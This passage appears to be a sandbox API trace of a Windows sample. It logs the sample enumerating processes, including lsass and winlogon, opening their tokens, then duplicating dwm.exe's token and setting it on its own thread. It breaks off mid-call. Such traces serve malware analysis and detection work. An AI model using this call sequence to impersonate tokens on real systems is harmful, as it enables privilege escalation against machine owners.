[0096.118] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0x13, TokenInformation=0x3d3ff44, TokenInformationLength=0x4, ReturnLength=0x3d3ff4c | out: TokenInformation=0x3d3ff44, ReturnLength=0x3d3ff4c) returned 1 [0096.118] GetTokenInformation (in: TokenHandle=0x3d8, TokenInformationClass=0xa, TokenInformation=0x3d3ff50, TokenInformationLength=0x38, ReturnLength=0x3d3ff4c | out: TokenInformation=0x3d3ff50, ReturnLength=0x3d3ff4c) returned 1 [0096.118] CloseHandle (hObject=0x3d8) returned 1 [0096.118] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3d8 [0096.122] Process32FirstW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.123] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0096.123] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.124] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x3dc [0096.124] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x0) returned 0 [0096.124] CloseHandle (hObject=0x3dc) returned 1 [0096.124] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.125] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x104) returned 0x3dc [0096.125] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x3e0) returned 1 [0096.125] GetTokenInformation (in: TokenHandle=0x3e0, TokenInformationClass=0xa, TokenInformation=0x3d3fee0, TokenInformationLength=0x38, ReturnLength=0x3d3ff1c | out: TokenInformation=0x3d3fee0, ReturnLength=0x3d3ff1c) returned 1 [0096.125] CloseHandle (hObject=0x3e0) returned 1 [0096.125] CloseHandle (hObject=0x3dc) returned 1 [0096.125] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.126] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x148) returned 0x3dc [0096.127] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x3e0) returned 1 [0096.127] GetTokenInformation (in: TokenHandle=0x3e0, TokenInformationClass=0xa, TokenInformation=0x3d3fee0, TokenInformationLength=0x38, ReturnLength=0x3d3ff1c | out: TokenInformation=0x3d3fee0, ReturnLength=0x3d3ff1c) returned 1 [0096.127] CloseHandle (hObject=0x3e0) returned 1 [0096.127] CloseHandle (hObject=0x3dc) returned 1 [0096.127] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.128] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x16c) returned 0x3dc [0096.128] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x3e0) returned 1 [0096.128] GetTokenInformation (in: TokenHandle=0x3e0, TokenInformationClass=0xa, TokenInformation=0x3d3fee0, TokenInformationLength=0x38, ReturnLength=0x3d3ff1c | out: TokenInformation=0x3d3fee0, ReturnLength=0x3d3ff1c) returned 1 [0096.128] CloseHandle (hObject=0x3e0) returned 1 [0096.128] CloseHandle (hObject=0x3dc) returned 1 [0096.128] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x164, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.129] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x178) returned 0x3dc [0096.129] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x3e0) returned 1 [0096.129] GetTokenInformation (in: TokenHandle=0x3e0, TokenInformationClass=0xa, TokenInformation=0x3d3fee0, TokenInformationLength=0x38, ReturnLength=0x3d3ff1c | out: TokenInformation=0x3d3fee0, ReturnLength=0x3d3ff1c) returned 1 [0096.129] CloseHandle (hObject=0x3e0) returned 1 [0096.129] CloseHandle (hObject=0x3dc) returned 1 [0096.129] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x164, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.130] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1a0) returned 0x3dc [0096.130] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x3e0) returned 1 [0096.130] GetTokenInformation (in: TokenHandle=0x3e0, TokenInformationClass=0xa, TokenInformation=0x3d3fee0, TokenInformationLength=0x38, ReturnLength=0x3d3ff1c | out: TokenInformation=0x3d3fee0, ReturnLength=0x3d3ff1c) returned 1 [0096.130] CloseHandle (hObject=0x3e0) returned 1 [0096.130] CloseHandle (hObject=0x3dc) returned 1 [0096.130] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x16c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.131] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c4) returned 0x3dc [0096.131] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x3e0) returned 1 [0096.131] GetTokenInformation (in: TokenHandle=0x3e0, TokenInformationClass=0xa, TokenInformation=0x3d3fee0, TokenInformationLength=0x38, ReturnLength=0x3d3ff1c | out: TokenInformation=0x3d3fee0, ReturnLength=0x3d3ff1c) returned 1 [0096.132] CloseHandle (hObject=0x3e0) returned 1 [0096.132] CloseHandle (hObject=0x3dc) returned 1 [0096.132] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.133] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1cc) returned 0x3dc [0096.133] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x3e0) returned 1 [0096.133] GetTokenInformation (in: TokenHandle=0x3e0, TokenInformationClass=0xa, TokenInformation=0x3d3fee0, TokenInformationLength=0x38, ReturnLength=0x3d3ff1c | out: TokenInformation=0x3d3fee0, ReturnLength=0x3d3ff1c) returned 1 [0096.133] CloseHandle (hObject=0x3e0) returned 1 [0096.133] CloseHandle (hObject=0x3dc) returned 1 [0096.133] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x16c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0096.134] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d4) returned 0x3dc [0096.134] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x3e0) returned 1 [0096.134] GetTokenInformation (in: TokenHandle=0x3e0, TokenInformationClass=0xa, TokenInformation=0x3d3fee0, TokenInformationLength=0x38, ReturnLength=0x3d3ff1c | out: TokenInformation=0x3d3fee0, ReturnLength=0x3d3ff1c) returned 1 [0096.134] CloseHandle (hObject=0x3e0) returned 1 [0096.134] CloseHandle (hObject=0x3dc) returned 1 [0096.134] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.135] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x244) returned 0x3dc [0096.135] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x0) returned 0 [0096.135] CloseHandle (hObject=0x3dc) returned 1 [0096.135] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.136] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x288) returned 0x3dc [0096.136] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x0) returned 0 [0096.136] CloseHandle (hObject=0x3dc) returned 1 [0096.136] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.137] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2bc) returned 0x3dc [0096.137] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x0) returned 0 [0096.137] CloseHandle (hObject=0x3dc) returned 1 [0096.137] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.138] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x32c) returned 0x3dc [0096.138] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x3e0) returned 1 [0096.138] GetTokenInformation (in: TokenHandle=0x3e0, TokenInformationClass=0xa, TokenInformation=0x3d3fee0, TokenInformationLength=0x38, ReturnLength=0x3d3ff1c | out: TokenInformation=0x3d3fee0, ReturnLength=0x3d3ff1c) returned 1 [0096.138] CloseHandle (hObject=0x3e0) returned 1 [0096.139] CloseHandle (hObject=0x3dc) returned 1 [0096.139] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.140] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x360) returned 0x3dc [0096.140] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x3e0) returned 1 [0096.140] GetTokenInformation (in: TokenHandle=0x3e0, TokenInformationClass=0xa, TokenInformation=0x3d3fee0, TokenInformationLength=0x38, ReturnLength=0x3d3ff1c | out: TokenInformation=0x3d3fee0, ReturnLength=0x3d3ff1c) returned 1 [0096.140] CloseHandle (hObject=0x3e0) returned 1 [0096.140] CloseHandle (hObject=0x3dc) returned 1 [0096.140] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.141] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3f0) returned 0x3dc [0096.141] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x0) returned 0 [0096.141] CloseHandle (hObject=0x3dc) returned 1 [0096.141] Process32NextW (in: hSnapshot=0x3d8, lppe=0x3d3fcb0 | out: lppe=0x3d3fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.142] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x368) returned 0x3dc [0096.142] OpenProcessToken (in: ProcessHandle=0x3dc, DesiredAccess=0xa, TokenHandle=0x3d3ff2c | out: TokenHandle=0x3d3ff2c*=0x3e0) returned 1 [0096.142] GetTokenInformation (in: TokenHandle=0x3e0, TokenInformationClass=0xa, TokenInformation=0x3d3fee0, TokenInformationLength=0x38, ReturnLength=0x3d3ff1c | out: TokenInformation=0x3d3fee0, ReturnLength=0x3d3ff1c) returned 1 [0096.142] DuplicateToken (in: ExistingTokenHandle=0x3e0, ImpersonationLevel=0x2, DuplicateTokenHandle=0x3d3ff28 | out: DuplicateTokenHandle=0x3d3ff28*=0x3e4) returned 1 [0096.142] SetThreadToken (Thread=0x0, Token=0x3e4) returned 1 [0096.142] CloseHandle (hObject=0x3e4) returned 1 [0096.142] CloseHandle (hObject=0x3e0) returned 1 [0096.142] CloseHandle (hObject=0x3dc) returned 1 [0096.142] CloseHandle (hObject=0x3d8) returned 1 Thread: id = 30 os_tid = 0xb84 [0096.358] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3e7ff48 | out: TokenHandle=0x3e7ff48*=0x430) returned 1 [0096.358] GetTokenInformation (in: TokenHandle=0x430, TokenInformationClass=0x12, TokenInformation=0x3e7ff44, TokenInformationLength=0x4, ReturnLength=0x3e7ff4c | out: TokenInformation=0x3e7ff44, ReturnLength=0x3e7ff4c) returned 1 [0096.359] GetTokenInformation (in: TokenHandle=0x430, TokenInformationClass=0x13, TokenInformation=0x3e7ff44, TokenInformationLength=0x4, ReturnLength=0x3e7ff4c | out: TokenInformation=0x3e7ff44, ReturnLength=0x3e7ff4c) returned 1 [0096.359] GetTokenInformation (in: TokenHandle=0x3d4, TokenInformationClass=0xa, TokenInformation=0x3e7ff50, TokenInformationLength=0x38, ReturnLength=0x3e7ff4c | out: TokenInformation=0x3e7ff50, ReturnLength=0x3e7ff4c) returned 1 [0096.359] CloseHandle (hObject=0x3d4) returned 1 [0096.359] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3d4 [0096.363] Process32FirstW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.364] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0096.364] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.366] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x434 [0096.367] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x0) returned 0 [0096.367] CloseHandle (hObject=0x434) returned 1 [0096.367] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.368] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x104) returned 0x434 [0096.368] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x438) returned 1 [0096.368] GetTokenInformation (in: TokenHandle=0x438, TokenInformationClass=0xa, TokenInformation=0x3e7fee0, TokenInformationLength=0x38, ReturnLength=0x3e7ff1c | out: TokenInformation=0x3e7fee0, ReturnLength=0x3e7ff1c) returned 1 [0096.368] CloseHandle (hObject=0x438) returned 1 [0096.368] CloseHandle (hObject=0x434) returned 1 [0096.368] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.369] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x148) returned 0x434 [0096.369] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x438) returned 1 [0096.369] GetTokenInformation (in: TokenHandle=0x438, TokenInformationClass=0xa, TokenInformation=0x3e7fee0, TokenInformationLength=0x38, ReturnLength=0x3e7ff1c | out: TokenInformation=0x3e7fee0, ReturnLength=0x3e7ff1c) returned 1 [0096.370] CloseHandle (hObject=0x438) returned 1 [0096.370] CloseHandle (hObject=0x434) returned 1 [0096.370] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.371] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x16c) returned 0x434 [0096.371] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x438) returned 1 [0096.371] GetTokenInformation (in: TokenHandle=0x438, TokenInformationClass=0xa, TokenInformation=0x3e7fee0, TokenInformationLength=0x38, ReturnLength=0x3e7ff1c | out: TokenInformation=0x3e7fee0, ReturnLength=0x3e7ff1c) returned 1 [0096.371] CloseHandle (hObject=0x438) returned 1 [0096.371] CloseHandle (hObject=0x434) returned 1 [0096.371] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x164, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.372] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x178) returned 0x434 [0096.372] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x438) returned 1 [0096.372] GetTokenInformation (in: TokenHandle=0x438, TokenInformationClass=0xa, TokenInformation=0x3e7fee0, TokenInformationLength=0x38, ReturnLength=0x3e7ff1c | out: TokenInformation=0x3e7fee0, ReturnLength=0x3e7ff1c) returned 1 [0096.373] CloseHandle (hObject=0x438) returned 1 [0096.373] CloseHandle (hObject=0x434) returned 1 [0096.373] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x164, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.374] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1a0) returned 0x434 [0096.374] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x438) returned 1 [0096.374] GetTokenInformation (in: TokenHandle=0x438, TokenInformationClass=0xa, TokenInformation=0x3e7fee0, TokenInformationLength=0x38, ReturnLength=0x3e7ff1c | out: TokenInformation=0x3e7fee0, ReturnLength=0x3e7ff1c) returned 1 [0096.374] CloseHandle (hObject=0x438) returned 1 [0096.374] CloseHandle (hObject=0x434) returned 1 [0096.374] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x16c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.375] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c4) returned 0x434 [0096.375] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x438) returned 1 [0096.375] GetTokenInformation (in: TokenHandle=0x438, TokenInformationClass=0xa, TokenInformation=0x3e7fee0, TokenInformationLength=0x38, ReturnLength=0x3e7ff1c | out: TokenInformation=0x3e7fee0, ReturnLength=0x3e7ff1c) returned 1 [0096.376] CloseHandle (hObject=0x438) returned 1 [0096.376] CloseHandle (hObject=0x434) returned 1 [0096.376] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.378] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1cc) returned 0x434 [0096.378] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x438) returned 1 [0096.378] GetTokenInformation (in: TokenHandle=0x438, TokenInformationClass=0xa, TokenInformation=0x3e7fee0, TokenInformationLength=0x38, ReturnLength=0x3e7ff1c | out: TokenInformation=0x3e7fee0, ReturnLength=0x3e7ff1c) returned 1 [0096.378] CloseHandle (hObject=0x438) returned 1 [0096.378] CloseHandle (hObject=0x434) returned 1 [0096.378] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x16c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0096.380] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d4) returned 0x434 [0096.380] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x438) returned 1 [0096.380] GetTokenInformation (in: TokenHandle=0x438, TokenInformationClass=0xa, TokenInformation=0x3e7fee0, TokenInformationLength=0x38, ReturnLength=0x3e7ff1c | out: TokenInformation=0x3e7fee0, ReturnLength=0x3e7ff1c) returned 1 [0096.380] CloseHandle (hObject=0x438) returned 1 [0096.380] CloseHandle (hObject=0x434) returned 1 [0096.380] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.381] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x244) returned 0x434 [0096.381] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x0) returned 0 [0096.381] CloseHandle (hObject=0x434) returned 1 [0096.381] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.383] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x288) returned 0x434 [0096.383] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x0) returned 0 [0096.383] CloseHandle (hObject=0x434) returned 1 [0096.383] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.384] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2bc) returned 0x434 [0096.384] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x0) returned 0 [0096.384] CloseHandle (hObject=0x434) returned 1 [0096.384] Process32NextW (in: hSnapshot=0x3d4, lppe=0x3e7fcb0 | out: lppe=0x3e7fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.385] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x32c) returned 0x434 [0096.385] OpenProcessToken (in: ProcessHandle=0x434, DesiredAccess=0xa, TokenHandle=0x3e7ff2c | out: TokenHandle=0x3e7ff2c*=0x438) returned 1 [0096.385] GetTokenInformation (in: TokenHandle=0x438, TokenInformationClass=0xa, TokenInformation=0x3e7fee0, TokenInformationLength=0x38, ReturnLength=0x3e7ff1c | out: TokenInformation=0x3e7fee0, 